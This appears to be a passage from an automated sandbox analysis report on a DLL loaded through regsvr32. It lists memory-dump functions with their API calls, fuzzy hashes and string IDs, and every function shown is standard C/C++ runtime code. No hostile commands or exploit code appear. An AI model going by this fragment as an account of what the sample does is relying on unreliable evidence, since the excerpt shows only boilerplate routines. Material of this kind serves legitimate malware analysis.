                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                    • API String ID: 0-3922119987
                                                                                                                                                                                                                    • Opcode ID: fa109614b91723c92a4e19e7525db1da9e3047296da335304c79ba2b5ef48149
                                                                                                                                                                                                                    • Instruction ID: 038f365c61de5930b9d16d15429f232cd9235c3ee49f85be4a0c1c293ce4f2fa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa109614b91723c92a4e19e7525db1da9e3047296da335304c79ba2b5ef48149
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC41B071A0461EABCB11DF9DCC85D9EBBF9EF8A310F50806AE804A7640D7B09B40CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F21A129
                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6F21A20F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CatchEncodePointer
                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                    • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                    • Opcode ID: 18e10770b472b060085691d59ab487dca8f967720f787f1e46b6a47d84e502a7
                                                                                                                                                                                                                    • Instruction ID: 362c84faa81cdc4ed13b0c36616e4a22ce046a6e62c97b835ed4fb071c51fa41
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18e10770b472b060085691d59ab487dca8f967720f787f1e46b6a47d84e502a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D41587190420EAFDF02CF98C880AEE7BF5BF48305F148199EA04A6250D336A961DF54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6F20254F
                                                                                                                                                                                                                      • Part of subcall function 6F2182AE: RaiseException.KERNEL32(E06D7363,00000001,00000003,000000FF,00000000,24448D6F,6F2151E0,000000FF,6F24874C,?,000000FF,?,24448D6F), ref: 6F21830E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                    • API String ID: 3109751735-1866435925
                                                                                                                                                                                                                    • Opcode ID: 98b426f9327624e46aead96f5595a4d08511ea4ee364a74d62afefbd27b65fb3
                                                                                                                                                                                                                    • Instruction ID: abda5dfe594f2db717f70ef7e892db712cea3533d389aaafe53d811ff7d2672d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98b426f9327624e46aead96f5595a4d08511ea4ee364a74d62afefbd27b65fb3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8611AEF391470D6BC704DE68DC41B96B3ACAF56210F04861BF9549BA80E7B0A9508FA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                                                                                    • Opcode ID: 49029b8ba6a8b0f7b7ded6106b056620c99e19ed425b6f1beaa5422843b28bc5
                                                                                                                                                                                                                    • Instruction ID: 4f63abb0061179802136e663e9a7272b7a262409a55fcadb3278595c3b85e61b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49029b8ba6a8b0f7b7ded6106b056620c99e19ed425b6f1beaa5422843b28bc5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEB103B290935E9FDB018F18C890BEEBBE5EF46351F1441AAD944AF281C634E941CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                    • Opcode ID: 330ca96169c62b96118f679b7d6c107cf43dc5ae9dda215046841734e514fa19
                                                                                                                                                                                                                    • Instruction ID: d048a2b9ca56e77b74c3a0a3067c0b670cc6a567e85aa7ae97d56ebd881fea9f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 330ca96169c62b96118f679b7d6c107cf43dc5ae9dda215046841734e514fa19
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F551DD7260E60E9FEB24CF54C950BAA77F4EF08315F10062EDA5547698E731A9A0CF9C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2568140703-0
                                                                                                                                                                                                                    • Opcode ID: 8547db68e969c1c14ea15079d5b5a39e677ef142b1b5176cfbed5acad7ead9ba
                                                                                                                                                                                                                    • Instruction ID: 68c0954d97184751c335be500820dfefaef2de55c37f7b90153251a468d65078
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8547db68e969c1c14ea15079d5b5a39e677ef142b1b5176cfbed5acad7ead9ba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B310433A0421A4B9F08DEADE49557ABBE5EF55771710836FEC05CB244EB31E851CA80
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,6F23C658,00000000,00000000,?,?,?,00000004,00000000,00000001,6F23C658,0000007F,?,?), ref: 6F22D638
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 6F22D6AD
                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6F22D6BF
                                                                                                                                                                                                                    • __freea.LIBCMT ref: 6F22D6C8
                                                                                                                                                                                                                      • Part of subcall function 6F227F9C: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                                                    • Opcode ID: 3588e868a27c60e24350bc5c0230d400a402fb2d577d50e391620282586c6a9d
                                                                                                                                                                                                                    • Instruction ID: 083b4997e88491a0a7ef42d0fe2d7f3f96bb3f74d784ab9b058b42742cc64162
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3588e868a27c60e24350bc5c0230d400a402fb2d577d50e391620282586c6a9d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60318B72D0021EABDB208F64EC44DFE7BBAFF45721F414269E8189A250DB359961CFA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,?,6F2355EC,?,00000001,?,00000001,?,6F22DEF4,00000020,00000000,00000001), ref: 6F235F79
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6F2355EC,?,00000001,?,00000001,?,6F22DEF4,00000020,00000000,00000001,00000020,00000001,?,6F22E473,00000008), ref: 6F235F85
                                                                                                                                                                                                                      • Part of subcall function 6F235F4B: CloseHandle.KERNEL32(FFFFFFFE,6F235F95,?,6F2355EC,?,00000001,?,00000001,?,6F22DEF4,00000020,00000000,00000001,00000020,00000001), ref: 6F235F5B
                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 6F235F95
                                                                                                                                                                                                                      • Part of subcall function 6F235F0D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F235F3C,6F2355D2,00000001,?,6F22DEF4,00000020,00000000,00000001,00000020), ref: 6F235F20
                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,6F2355EC,?,00000001,?,00000001,?,6F22DEF4,00000020,00000000,00000001,00000020), ref: 6F235FAA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                    • Opcode ID: 5baef9e8d30cfd0e11f9c0a29bcbe1e67d2b701061afb2fa3fbccc66af5a152c
                                                                                                                                                                                                                    • Instruction ID: 17ced03613f49a62badf4fbc67d8dbbe755e060a323c9bba9795a472ee29c365
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5baef9e8d30cfd0e11f9c0a29bcbe1e67d2b701061afb2fa3fbccc66af5a152c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F0F8B750563ABBCF221EA5CC099893F66EF0A3B1B054010FA0C96560CA328830EFD0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearCopyInit_com_issue_error
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 309108855-0
                                                                                                                                                                                                                    • Opcode ID: fc6bd40d6d4fff496898cb82956c13298d2be5168bfaedc16f88b504efe9cdb2
                                                                                                                                                                                                                    • Instruction ID: fe7d21ed9a6f4f38c432497d0f81aa96ea58151ff845f1623d7acf01bcd3065a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc6bd40d6d4fff496898cb82956c13298d2be5168bfaedc16f88b504efe9cdb2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBD05EB36016286BCF206BA4DC0C8CA7B5EEE076A53000422FB44D2800CFA5CA30CFE8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcspn
                                                                                                                                                                                                                    • String ID: k, o
                                                                                                                                                                                                                    • API String ID: 3709121408-3032303857
                                                                                                                                                                                                                    • Opcode ID: 32e96c80c04f0810266bef62383acbb3d59ca8a031818f364e0c0d725a427408
                                                                                                                                                                                                                    • Instruction ID: a33814a45689d9d5b67755c18cd87474bcdcb460fe851c09cf826b314394d30f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32e96c80c04f0810266bef62383acbb3d59ca8a031818f364e0c0d725a427408
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FE18B72A0024EDFDB04DFA8C894EEEBBB9FF49304F108159E815AB251D735A945CF61
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __floor_pentium4.LIBCMT ref: 6F20BE8D
                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 6F20BF4C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • unordered_map/set too long, xrefs: 6F20BF47
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Xinvalid_argument__floor_pentium4std::_
                                                                                                                                                                                                                    • String ID: unordered_map/set too long
                                                                                                                                                                                                                    • API String ID: 3194428529-306623848
                                                                                                                                                                                                                    • Opcode ID: 8940f95f10aabe88de5c6e7705fe0db13cc5947fdf0329d659b670e8e1675451
                                                                                                                                                                                                                    • Instruction ID: acd834b0a8347b0d980406bba973409f6bba594f6a2e6a371cae0d8dbdf41fcb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8940f95f10aabe88de5c6e7705fe0db13cc5947fdf0329d659b670e8e1675451
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F71AE72A047098FCB25DF69C480A9AFBF4FF49314F10866AE455EB641E731A941CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __floor_pentium4.LIBCMT ref: 6F213A02
                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 6F213ACB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • unordered_map/set too long, xrefs: 6F213AC6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Xinvalid_argument__floor_pentium4std::_
                                                                                                                                                                                                                    • String ID: unordered_map/set too long
                                                                                                                                                                                                                    • API String ID: 3194428529-306623848
                                                                                                                                                                                                                    • Opcode ID: 032a9448082911c9f402d4bc36f7620345ed635d71a410fb80357c8a3080a952
                                                                                                                                                                                                                    • Instruction ID: 66dbc39f2e1537827db13814a4b8f29e9954c078de2b58a94e5cec7d9e38118b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 032a9448082911c9f402d4bc36f7620345ed635d71a410fb80357c8a3080a952
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48618CB190860E9FCB15CF69C440A9EFBF5FF49314F20836AE415AB240E731A991CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6F20254F
                                                                                                                                                                                                                      • Part of subcall function 6F2182AE: RaiseException.KERNEL32(E06D7363,00000001,00000003,000000FF,00000000,24448D6F,6F2151E0,000000FF,6F24874C,?,000000FF,?,24448D6F), ref: 6F21830E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                                                                                                                                    • API String ID: 3109751735-1240500531
                                                                                                                                                                                                                    • Opcode ID: c354e4779ee61dd139bb7da588926c69c389342b39884360c4827324e7977b69
                                                                                                                                                                                                                    • Instruction ID: 2c82cd804dbf3876dc3f14bf30742141b131099a59161a5ea8af8dc3f2fd4b27
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c354e4779ee61dd139bb7da588926c69c389342b39884360c4827324e7977b69
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A41B2B290460DABDB04DF58C840B9EFBB9EF45724F14861AE914A7A80D775A944CFA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F2047B8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                    • String ID: ; o$; o
                                                                                                                                                                                                                    • API String ID: 118556049-3456712660
                                                                                                                                                                                                                    • Opcode ID: f38fa0c251c411b9baa6317c2a365d215e41aa516aca2220f3682f26de2a732e
                                                                                                                                                                                                                    • Instruction ID: 4cdf83f55d28dcc0fe54b8c9cf57a63ea2a57e55eabda4515932ed2af886ba94
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f38fa0c251c411b9baa6317c2a365d215e41aa516aca2220f3682f26de2a732e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00316A32A0424C9BC318DF7C98D0A6DB7E8FB56215B14832EE966C77D1DB70A5448F52
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22BC81: _free.LIBCMT ref: 6F22BCE1
                                                                                                                                                                                                                      • Part of subcall function 6F22B8FA: GetOEMCP.KERNEL32(00000000,6F22BB81,?,zO"o,6F24D0FC,6F24D0FC,6F224F7A), ref: 6F22B925
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22BBDE
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22BC14
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                    • String ID: zO"o
                                                                                                                                                                                                                    • API String ID: 269201875-616525808
                                                                                                                                                                                                                    • Opcode ID: 3f4bda2b1e5b3ea6d4bf1246eb55b88f7a5a69081b551533bde78aaa12c03e82
                                                                                                                                                                                                                    • Instruction ID: 79d8230fb071a61f3aa26708775d41de541055f688a1163d5b5934e81c118d98
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f4bda2b1e5b3ea6d4bf1246eb55b88f7a5a69081b551533bde78aaa12c03e82
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A31AF7290824EAFCB01DF68C890ADE77F4FF45325F11415AF8249B2A0EB36A950CF61
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6F233A5A,6F204D84,00000050,?,?,?,?,?), ref: 6F2338DA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                    • API String ID: 0-711371036
                                                                                                                                                                                                                    • Opcode ID: bb718289c436e705bf31877268c6685c07b56bfeb3d60a38de3ebff872b52ccc
                                                                                                                                                                                                                    • Instruction ID: 6a29f249752e6a21e9db93d6a9d9ba6fe29373c694e217c8159565009f137542
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb718289c436e705bf31877268c6685c07b56bfeb3d60a38de3ebff872b52ccc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 112192E3E4412EA6E7148A65C903BC763A6BF44F62B024525E909DB200E733EF44CB90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • InitializeCriticalSectionEx.KERNEL32(00000008,00000000,00000000), ref: 6F21155D
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6F211567
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalErrorInitializeLastSection
                                                                                                                                                                                                                    • String ID: 8S$o
                                                                                                                                                                                                                    • API String ID: 3413597225-1455686356
                                                                                                                                                                                                                    • Opcode ID: ab692cd25c09aea03926d240e9d84d80f87cedce47a7a96d99c58f964abaee6b
                                                                                                                                                                                                                    • Instruction ID: 205a035900692b0385df700fb247c65248629b0b0581aca15a41d7d048ed1bc2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab692cd25c09aea03926d240e9d84d80f87cedce47a7a96d99c58f964abaee6b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20213B72608B1AA7C321CE658844B47BBE9AFE5754F11461EE9598B210DB70D4818FE4
                                                                                                                                                                                                                    Uniqueness

